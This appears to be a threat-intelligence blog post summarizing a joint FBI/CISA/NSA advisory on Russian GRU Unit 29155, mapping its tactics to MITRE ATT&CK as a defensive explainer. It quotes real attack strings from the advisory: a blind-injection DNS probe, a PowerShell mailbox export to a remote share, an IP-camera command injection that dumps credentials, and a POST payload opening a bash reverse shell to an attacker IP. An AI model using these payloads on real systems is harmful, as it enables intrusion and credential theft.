On September 5th, 2024, the Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and National Security Agency (NSA) released a joint advisory about the cyber activities of a Russian cyber unit known as GRU Unit 29155 (161st Specialist Training Center) [1]. This group, part of the Russian military, has conducted espionage, sabotage, and reputational harm campaigns against various global targets since 2020. These operations focused on critical infrastructure, aim to destabilize regions, disrupt services, and steal sensitive information, mainly through their highly associated and destructive malware, such as WhisperGate.
In this blog post, we will explore the tactics, techniques, and procedures (TTPs) employed by Unit 29155 and how organizations can defend themselves against these sophisticated cyberattacks.
Russian GRU Unit 29155: Cyber Operations
Unit 29155 is a military intelligence group within the Russian General Staff Main Intelligence Directorate (GRU), responsible for carrying out offensive cyber operations globally. Their tactics range from espionage to outright sabotage, and they are notorious for using sophisticated and destructive malware, including WhisperGate, which was notably deployed against Ukrainian organizations in January 2022.
Unit 29155 has broadened its reach beyond Ukraine, targeting NATO members and critical infrastructure sectors in Europe, Latin America, North America, and Central Asia. Their actions aim to disrupt essential services, particularly those that support efforts to aid Ukraine.
Tactics, Techniques, and Procedures (TTPs) Used by Russian Unit 29155
Unit 29155 employs a systematic and highly organized approach to infiltrating and exploiting victim networks. Below is a summary of key TTPs observed in their operations, as mapped to the MITRE ATT&CK framework.
Reconnaissance
Unit 29155 has been observed targeting IP ranges used by multiple governments and critical infrastructure organizations. These actors use various publicly available tools to scan and exploit vulnerabilities.
Below is a list of the tools and methods they utilize, categorized under different reconnaissance tactics:
T1595.001 - Active Scanning: Scanning IP Blocks
Unit 29155 uses open-source tools like Nmap, Acunetix, and MASSCAN to scan IP ranges, identifying open ports, services, and vulnerabilities.
T1595.002 - Active Scanning: Vulnerability Scanning
Tools such as Acunetix, Amass, Droopescan, eScan, and JoomScan are used to identify vulnerable IoT devices and services on the network. MASSCAN and Nmap are also leveraged to discover machines inside victim networks.
For vulnerability discovery, Acunetix was observed gathering details on potential issues like blind cross-site scripting with the following command [1]:
|
"GET /CMS/files/log.htm HTTP/1.1" * * "(nslookup hitccruvbrumn76c1b.bxss.me||perl -e \"gethostbyname('hitccruvbrumn76c1b.bxss.me')\")"
|
Explanation of the web request:
This is a standard HTTP GET request that attempts to retrieve a file located at /CMS/files/log.htm from a web server.
This command attempts to perform a DNS lookup for the domain hitccruvbrumn76c1b[.]bxss[.]me. The nslookup command resolves domain names to IP addresses. By embedding this in the request, the attacker can check if the server resolves the given domain, thus confirming that the payload was executed. The domain bxss.me is often used in exploitation testing for blind cross-site scripting (XSS), where the attacker can see if a vulnerable server reaches out to this external server, indicating the script has been executed on the target.
This portion executes a Perl command that performs a similar function to nslookup. The gethostbyname function in Perl is used to resolve the IP address of the domain hitccruvbrumn76c1b[.]bxss[.]me. It's another method to trigger a DNS query, verifying whether the target server executes the code and reaches out to the attacker's controlled domain.
T1590.002 - Gather Victim Network Information: DNS
The actors use tools like Amass and VirusTotal to collect information on victims' DNS, including subdomains, which are later used in targeting efforts.
T1596.005 - Search Open Technical Databases
The group also leverages the Shodan[.]io search engine to identify IP addresses hosting network devices with known vulnerabilities (CVE refers to specific security flaws). By scanning for these weaknesses, the group can locate and target publicly accessible devices that provide easy entry points into the network—essentially targeting "low-hanging fruits" that are easier to exploit.
Resource Development
T1588.001 - Obtain Capabilities: Malware
Unit 29155 actors, along with their affiliates, frequently use dark web forums to acquire a variety of malicious tools, such as malware and malware loaders. This behavior is common among advanced threat actors, as it allows them to quickly access ready-made tools instead of developing them from scratch.
They have notably been seen utilizing Raspberry Robin malware, in conjunction with the Saint Bot loader, to act as an access broker.
Important Note: In addition to other malware, Unit 29155 is widely associated with the use of WhisperGate in its attacks on Ukraine. However, WhisperGate is not unique to this group and has been employed by other cyber actors as well.
T1583.003 - Acquire Infrastructure: Virtual Private Server
Instead of using their own infrastructure, the group rents Virtual Private Servers (VPSs) to host operational tools, perform reconnaissance, and exfiltrate data from compromised systems. Using VPSs allows the actors to remain anonymous and flexible in their operations.
T1588.005 - Obtain Capabilities: Exploits
Unit 29155 actors also obtain CVE exploit scripts from GitHub repositories and other sources to exploit vulnerabilities in target networks.
The list below contains exploitation scripts for specific vulnerabilities that the group possesses. However, although the group has access to these publicly available exploits from various repositories, there is no evidence of active exploitation. The CVEs that the group has actively exploited are provided in the Initial Access section (below) [1].
-
CVE-2020-1472 (Microsoft: Windows Server)
-
CVE-2021-26084 (Atlassian Confluence Server and Data Center)
-
CVE-2021-3156 (Red Hat: Privilege Escalation via Command Line Argument Parsing)
-
CVE-2021-4034 (Red Hat: Polkit Privilege Escalation)
-
CVE-2022-27666 (Red Hat: Heap Buffer Overflow Flaw)
Initial Access
T1078.001 - Valid Accounts: Default Accounts
A key tactic used by Unit 29155 is leveraging default usernames and passwords on devices like IP cameras. Using exploitation scripts, they authenticate and take control of these devices, particularly those left with factory settings, enabling easy access to systems that haven't been properly secured.
T1190 - Exploit Public-Facing Applications
Unit 29155 has also been known to exploit vulnerabilities in public-facing applications. They’ve used public exploits such as [1]:
-
CVE-2021-33044 & CVE-2021-33045 (Dahua Security)
-
CVE-2022-26134 & CVE-2022-26138 (Atlassian Confluence Server and Data Center)
-
CVE-2022-3236 (Sophos: Firewall)
For instance, they deployed the Through the Wire proof-of-concept exploit for CVE-2022-26134 to attack internet-facing Confluence servers [2], enabling them to execute arbitrary code remotely and gain further control over the compromised systems.
Execution
T1059.001 - Command and Scripting Interpreter: PowerShell
As part of their operational strategy, the group leverages PowerShell to interact with critical system components, escalate privileges, and carry out data exfiltration in a stealthy and efficient manner.
A specific example of their PowerShell use involves exfiltrating email data from compromised mail servers.
The following command is used to export mailbox data [1]:
|
powershell New-MailboxExportRequest - Mailbox <resource> - FilePath `\\{IP Address}\sharefolder\1.pst`
|
This command initiates a New-MailboxExportRequest, which directs the compromised mail server to export the contents of a specific mailbox to a designated shared folder on the network (\\{IP Address}\sharefolder\1.pst). This allows Unit 29155 to remotely collect entire mailboxes in PST format, which are then accessed for further exploitation. The flexibility and native integration of PowerShell into Windows environments enable the attackers to execute these actions with minimal detection, blending in with normal administrative activities.
Persistence
T1505.003 - Server Software Component: Web Shell
Unit 29155 has been observed deploying PHP web shells such as
The P.A.S. web shell is a commonly used, versatile tool that grants attackers remote access and the ability to execute commands on compromised web servers (e.g., repositories can be found here). By installing this web shell after gaining initial access, Unit 29155 ensures ongoing control over the system, allowing them to run commands, upload and manipulate files, and escalate privileges when necessary.
Credential Access
T1003.001 - OS Credential Dumping: LSASS Memory
Unit 29155 cyber actors target LSASS.exe (Local Security Authority Subsystem Service) to extract valuable authentication data stored in memory. LSASS is responsible for handling credentials and enforcing security policies in Windows systems, making it a key target for attackers.
By dumping the memory of LSASS, the attackers can retrieve sensitive information such as usernames, passwords, and password hashes, which can then be used to move laterally within the network or escalate privileges. Dumping LSASS allows Unit 29155 to gain access to high-value credentials without directly interacting with users, making it a powerful method for further compromising systems.
T1003.002 - OS Credential Dumping: Security Account Manager
Unit 29155 cyber actors have been observed dumping the Security Account Manager (SAM), a key Windows file located at C:\Windows\System32\config\SAM, which stores usernames and hashed passwords. The SAM works alongside the Local Security Authority (LSA) to manage user authentication. Attackers need elevated privileges, such as local administrator rights, to access and dump the SAM file. Once obtained, tools like Mimikatz, Impacket, or secretsdump.py are used to extract NTLM or LM password hashes. These credentials can then be cracked offline or reused for lateral movement within the network, making SAM dumping a powerful method for gaining unauthorized access without alerting users.
T1110.003 - Brute Force: Password Spraying
Unit 29155 cyber actors target Microsoft Outlook Web Access (OWA) with password spraying because it's often externally accessible, providing a gateway to internal networks. This technique exploits weak or default passwords across many accounts, allowing attackers to access sensitive emails and potentially escalate privileges within the organization.
T1552.001 - Unsecured Credentials: Credentials in Files
Unit 29155 cyber actors exploit vulnerabilities in IP cameras to extract sensitive configuration settings and plaintext credentials. After compromising the cameras, they perform remote command execution via specially crafted web requests to access stored credentials. These web requests, like:
|
hxxp://<IP>:<port>/PictureCatch.cgi?username=<NAME>&password=%3becho%20%22%3c%21--%23include%20file=%22SYS_CFG%22--%3e%22%3etmp/Login.htm%3b&data_type=1&attachment=1&channel=1&secret=1&key=PWNED
|
are designed to dump the camera’s configuration files, which include authentication credentials, in plaintext [1]. By obtaining these credentials, the actors can extend their access to the broader network, enabling further exploitation and lateral movement, while remaining undetected.
Discovery
T1046 - Network Service Discovery
Unit 29155 cyber actors use Nmap with the Nmap Scripting Engine (NSE) for network service discovery after gaining access to internal networks. NSE, written in Lua, allows attackers to create custom scripts to scan for active machines, open ports, and services. This enables them to efficiently map the network, identify vulnerabilities, and plan further attacks.
T1654- Log Enumeration
The group have also targeted and exfiltrated SECURITY and SYSTEM logs from compromised systems. By enumerating these logs, they can gather detailed information about system activities, including authentication events and security policies, which helps them evade detection.
Lateral Movement
T1550.002- Use Alternate Authentication Material: Pass the Hash
Unit 29155 used Pass-the-Hash to authenticate using NTLM hashes, allowing them to bypass the need for plaintext passwords when accessing systems via SMB. This method enables lateral movement within the network without requiring password cracking.
Command and Control
T1090.003 - Proxy: Multi-hop Proxy
In a separate action, these actors utilized ProxyChains to anonymize their activities, routing their web requests through multiple proxies. This technique was used to execute commands and interact with compromised systems. They retrieved NT hashes via SMB using smbclient, which provided access to sensitive data on internal network shares. Additionally, they executed commands using Windows Management Instrumentation (WMI) with the obtained hashes and made web requests to resources like i.php and tunnel.jsp. After gaining access to network shares, the actors also interacted with PSQL and MySQL databases to further compromise the target infrastructure.
T1071.001 - Application Layer Protocol: Web Protocols
Unit 29155 also uses POST requests over HTTP to deliver malicious payloads to targeted systems. In the code example provided below, the POST request contains user credentials and a malicious payload embedded in the txtUser field [1].
|
"txtUser=lol&txtPassword=2&btConnect=Piesl%C4%93gtiesbtConnect=Piesl%C4%93gties&chRemember=on&txtPassword=g00dPa%24%24w0rD&txtUser=$%7b@print(system(%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F179.43.175.38%2F6870%200%3E%261%22))%7d"
|
The payload leverages bash to open a reverse shell, connecting back to the attacker's machine on port 6870 (179[.]43[.]175[.]38). This reverse shell allows the attacker to remotely execute commands on the victim's machine.
The payload in the txtUser field decodes to a bash command that initiates an interactive shell (bash -i) and redirects input/output over TCP to the attacker's IP, effectively granting them control over the compromised system. This technique of hiding malicious code within POST data allows attackers to bypass basic detection mechanisms while establishing remote access.
T1071.004 - Application Layer Protocol: DNS
Attakers utilized DNS tunneling tools like dnscat/2 and Iodine to route IPv4 network traffic through DNS queries, enabling covert communication between compromised systems and their command-and-control servers.
T1095 - Non-Application Layer Protocol
Once Unit 29155 successfully runs a payload on a victim system (for instance, a Meterpreter payload), it leverages a reverse TCP session to initiate communication with their command-and-control infrastructure. This reverse TCP connection allows the attackers to maintain remote control over the compromised machine, enabling them to execute further commands. Reverse TCP sessions have been observed operating across various ports, including 1234, 1851, 43221, 443, 4444, 4688, 5432, 8080, 8081, 8082, 8084, 8085, 8088, 8089, 8090, 8443, 8487, and 8888, ensuring flexibility in maintaining access and control over the system.
T1105 - Ingress Tool Transfer
Upon successfully exploiting a target system, Unit 29155 cyber actors initiate a Meterpreter payload, establishing a persistent and encrypted communication channel with their command-and-control (C2) infrastructure. Using the Metasploit Framework, they systematically search for and exploit vulnerabilities in services like MySQL, PostgreSQL, and SSH to extend their reach. To maintain remote access and control, they deploy reverse shells, often leveraging Meterpreter or Netcat, with traffic typically routed over ports such as 8081. This attack flow allows for stealthy lateral movement and execution of further commands while bypassing traditional security controls.
T1572 - Protocol Tunneling
Unit 29155 cyber actors rely on encrypted communication methods to mask their activities, using tools like OpenVPN and GOST for secure tunneling. They configure OpenVPN over port 1194 to route traffic, allowing them to perform tasks such as Active Directory enumeration with tools like Adminer, Impacket, and ldapdomaindump without being detected. Additionally, they use the GOST tunneling tool via a SOCKS5 proxy to further anonymize their operations, with observed processes like java facilitating encrypted traffic through compromised networks, ensuring secure and hidden communication while carrying out lateral movement and exfiltration.
Exfiltration
T1567.002- Exfiltration Over Web Service: Exfiltration to Cloud Storage
Unit 29155 cyber actors employed Rclone, a popular command-line program, to exfiltrate data to cloud storage services like MEGA (mega[.]nz). Rclone is typically used for managing files across cloud storage platforms, but attackers exploit it to transfer stolen data from compromised systems to their controlled cloud storage accounts. By utilizing MEGA, a widely accessible and encrypted file hosting service, the actors ensure that exfiltrated data remains accessible to them while evading detection.
Impact
T1485 - Data Destruction
As stressed before, Unit 29155 actors also known for their focus on data destruction, often linked to the deployment of the destructive WhisperGate malware. Extensive evidence supports their use of this malware to wipe critical files and render systems inoperable, aligning with their objectives of causing widespread disruption and damage to targeted infrastructures.
. [Accessed: September 6, 2024]
[2] “GitHub - jbaines-r7/through_the_wire: CVE-2022-26134 Proof of Concept,” GitHub. Available: https://github.com/jbaines-r7/through_the_wire. [Accessed: Sep. 06, 2024]
.svg)
.svg)
